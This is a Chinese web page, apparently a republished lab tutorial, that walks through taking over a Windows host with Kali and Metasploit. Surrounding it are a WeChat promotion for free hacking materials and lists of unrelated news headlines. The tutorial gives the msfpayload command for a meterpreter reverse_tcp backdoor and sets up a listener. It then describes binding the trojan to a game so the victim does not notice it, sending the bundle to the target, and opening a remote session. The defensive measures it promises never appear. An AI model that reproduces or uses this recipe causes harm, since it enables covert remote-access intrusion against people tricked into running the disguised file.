天天短訊!Kali滲透Windows服務(wù)器
這個實驗主要讓我們學(xué)習(xí)漏洞掃描技術(shù)基本原理,了解其在網(wǎng)絡(luò)攻防中的作用,掌握使用Kali中的Metasploit對目標(biāo)主機滲透,并根據(jù)報告做出相應(yīng)的防護措施。
本次實戰(zhàn)環(huán)境:Kali滲透Windows服務(wù)器
實戰(zhàn)步驟一
(資料圖)
本實驗通過利用kali進(jìn)行漏洞掃描,使用Metasploit對目標(biāo)主機進(jìn)行滲透測試,并根據(jù)報告做出相應(yīng)的防護措施,共分為3個實驗步驟,詳情如下;
1、 實戰(zhàn)步驟一:生成setup.exe后門程序,即木馬程序。
(1) 打開kali終端,輸入ifconfig, 得到本機ip為192.168.189.130。
如下圖:
(2)輸入以下命令,使用msfpayload生成名為setup的后門程序:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:
(3) 進(jìn)入setup.exe所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”。
如下圖所示:
(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來設(shè)置本地主機;然后輸入exploit -z -j開始監(jiān)聽,如下圖所示:
實戰(zhàn)步驟二
將上面生成的木馬程序與某個軟件進(jìn)行捆綁。
【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】
① 網(wǎng)安學(xué)習(xí)成長路徑思維導(dǎo)圖?、?60+網(wǎng)安經(jīng)典常用工具包 ③ 100+SRC漏洞分析報告?、?150+網(wǎng)安攻防實戰(zhàn)技術(shù)電子書?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫?、?超1800頁CTF實戰(zhàn)技巧手冊?、?最新網(wǎng)安大廠面試題合集(含答案) ⑧ APP客戶端安全檢測指南(安卓+IOS)
(1)可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個其他的某個安全軟件合并為一個軟件,這樣在運行軟件時兩個軟件同時運行,不會引起注意。在tools里面進(jìn)入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個要合并的軟件,默認(rèn)選擇本軟件中自帶的小游戲程序:
點擊下一步,選擇第二個要捆綁的軟件,即之前生成的木馬程序setup.exe:
點擊下一步,選擇一個文件要保存的路徑:
繼續(xù)點擊下一步,開始捆綁軟件:
(2) 將捆綁后的軟件發(fā)送給目標(biāo)主機。
實戰(zhàn)步驟三
檢測目標(biāo)主機,對目標(biāo)主機進(jìn)行滲透測試。
(2) 目標(biāo)主機執(zhí)行程序后,在kali終端中的檢測程序會及時檢測到。在檢測到目標(biāo)主機運行程序后,后門程序會反向連接到msf,之后msf發(fā)起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務(wù)端(msf)。輸入sessionss:
可以看到目標(biāo)主機的ip為192.168.189.129,
(2)再繼續(xù)輸入sessions -i 1,之后可以對目標(biāo)主機進(jìn)行一系列的操作。如輸入sysinfo可知道目標(biāo)主機的系統(tǒng)信息;輸入 getuid查看對方正在運行的用戶。
要養(yǎng)成多思考多總結(jié)的習(xí)慣,對實驗結(jié)果多去分析,這樣回收獲更多。比如如何利用kali進(jìn)行漏洞掃描;如何使用Metasploit對目標(biāo)主機進(jìn)行滲透測試;這些都是這次實戰(zhàn)后可以去思考的。
更多網(wǎng)安技能的在線實操練習(xí),請點擊這里>>
關(guān)鍵詞:
您可能也感興趣:
今日熱點
為您推薦
機票里面包含保險嗎?飛機保險有必要買嗎?
遼寧擴大緩繳社保費政策實施范圍 補繳期間免收滯納金
近十年財險業(yè)務(wù)快速發(fā)展 財產(chǎn)保險業(yè)風(fēng)險保障水平不提升
更多
- 當(dāng)前快播:全球領(lǐng)先的電子制造商采用NVIDIA生成式AI和Omniver...
- 當(dāng)前熱門:宜鼎集團攜手NVIDIA 擴大AI生態(tài)系部署
- Flex Power Modules將1/4磚型DC/DC轉(zhuǎn)換器的額定功率提升至1...
- 焦點信息:WPP與NVIDIA共同打造用于數(shù)字廣告的生成式AI內(nèi)容引擎
- 驍龍連續(xù)四年攜手中國國家地理,用科技賦能生態(tài)保護 焦點關(guān)注
- 浪潮信息入圍Gartner全球服務(wù)器標(biāo)桿廠商 多項能力獲得認(rèn)可|焦點信息
- 快資訊:高速數(shù)字接口測試,讓容限測試更高效
- 高能低耗易部署,愛芯元智AX650N成Transformer最佳落地平臺 環(huán)球焦點
排行
- 天天短訊!Kali滲透Windows服務(wù)器
- 兩部門印發(fā)辦法明確 消防員面向社會公開招錄
- 低價出售410萬旅客信息?12306回應(yīng):為第三方泄漏
- 2019年這些新規(guī)將落地 又一次普惠“加薪”
- 北京8家醫(yī)院試點將推錯峰就診 率先開展“治堵”
- 數(shù)字化的城商行們怎么樣了?數(shù)字化轉(zhuǎn)型背后的故事
- 四川省稅務(wù)系統(tǒng)將推出10大類舉措服務(wù)納稅人、繳費人
- 長三角禁限塑新規(guī)實施尚存3個堵點 仍需多方合力推進(jìn)
- 中國鐵建高溢價溫州奪地 去年毛利率低于行業(yè)約10個百分點
- 推行郵件快件包裝“綠色革命” 從根源上解決問題
最近更新
- 天天短訊!Kali滲透Windows服務(wù)器
- 臨縣:加快“數(shù)字鄉(xiāng)村”建設(shè) 助力鄉(xiāng)村全面振興 每日觀點
- 今日觀點!四川省各地招生考試機構(gòu)咨詢電話一覽2023
- 洪城環(huán)境: 江西洪城環(huán)境股份有限公司獨立董事關(guān)于第八屆董事...
- 冷宮傳電視劇_冷宮帝姬上
- 機票燃油附加費年內(nèi)第三次下調(diào):6月5日起單程最低20元 世界資訊
- 榮耀Magic4超值優(yōu)惠 稀缺時刻搶購
- 聆達(dá)股份:擬91.5億元投建高效光伏電池片產(chǎn)業(yè)基地
- 速訊:2023新一線城市名單官宣,北方城市僅占四席
- 弒母者吳謝宇的心理檔案
- 川渝地區(qū)優(yōu)質(zhì)房地產(chǎn)開發(fā)項目對外招商
- 今日熱文:ideapad(y580)
- 《三分野》封俊是誰扮演的 封俊和向園是怎么回事?_全球視點
- 寒冰射手皮膚大全_寒冰射手皮膚_全球球精選
- 健康中國·未來家園 | 2023東方禪心健康暨療愈事業(yè)國際高峰...
- 1千瓦等于多少電流_1千瓦等于多少兆瓦 1兆瓦又等于多少千瓦
- t5687時刻表_t56晚點嗎
- 天壇辦公科研院定制空間 | 簡約之中存有大美
- 快訊!克宮:“莫斯科遭無人機襲擊”事件已匯報給普京 當(dāng)前短訊
- 當(dāng)前時訊:上門取件和自行寄回有什么區(qū)別(上門取件)
- 今頭條!尚格云頓的全部電影(尚格云頓電影大全)
- 今日快看!四川省內(nèi)江市資中縣重龍鎮(zhèn)郵編_四川內(nèi)江市資中縣郵編
- 右拾遺是什么官(右拾遺)-環(huán)球精選
- 閑魚怎么賣東西流程(咸魚怎么賣東西)
- 恒娖長公主結(jié)局(恒娖公主回宮哪一集簡介介紹)
- “多彩貴州·匠心珍品”(杭州)產(chǎn)銷對接推介會暨貴薈館·貴杭薈開館
- 每日熱議!美杜莎女王(菲利普親王吃過女王的醋嗎)
- 全球速訊:油炸豆腐泡怎么做好吃?
- 祁陽油豆腐炒肉的做法?-焦點熱聞